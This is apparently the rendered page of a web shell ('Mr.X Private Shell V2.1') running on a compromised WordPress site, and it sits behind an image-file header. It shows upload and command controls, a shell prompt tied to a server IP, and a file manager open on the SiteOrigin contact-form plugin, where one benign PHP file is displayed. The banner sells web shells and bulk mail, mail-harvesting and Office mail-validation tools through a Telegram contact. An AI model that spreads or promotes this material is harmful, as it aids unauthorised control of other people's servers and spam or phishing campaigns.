����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<?php

class SiteOrigin_Widget_ContactForm_Field_Text extends SiteOrigin_Widget_ContactForm_Field_Base {
	public function __construct( $options ) {
		$this->type = 'text';
		parent::__construct( $options );
	}

	public function render_field( $options ) {

		?>
		<input
			type="<?php echo $options['field']['type']; ?>"
			name="<?php echo esc_attr( $options['field_name'] ); ?>"
			id="<?php echo esc_attr( $options['field_id'] ); ?>"
			value="<?php echo esc_attr( $options['value'] ); ?>"
			class="sow-text-field"<?php echo ( $options['show_placeholder'] ? 'placeholder="' . esc_attr( $options['label'] ) . '"' : '' ); ?>
			<?php self::add_custom_attrs( $this->type ); ?>
		/>
		<?php
	}
}

Filemanager

Name Type Size Permission Actions
base.class.php File 827 B 0644
checkboxes.class.php File 1.1 KB 0644
email.class.php File 328 B 0644
name.class.php File 507 B 0644
number.class.php File 330 B 0644
radio.class.php File 810 B 0644
select.class.php File 1.36 KB 0644
subject.class.php File 560 B 0644
tel.class.php File 324 B 0644
text.class.php File 696 B 0644
textarea.class.php File 543 B 0644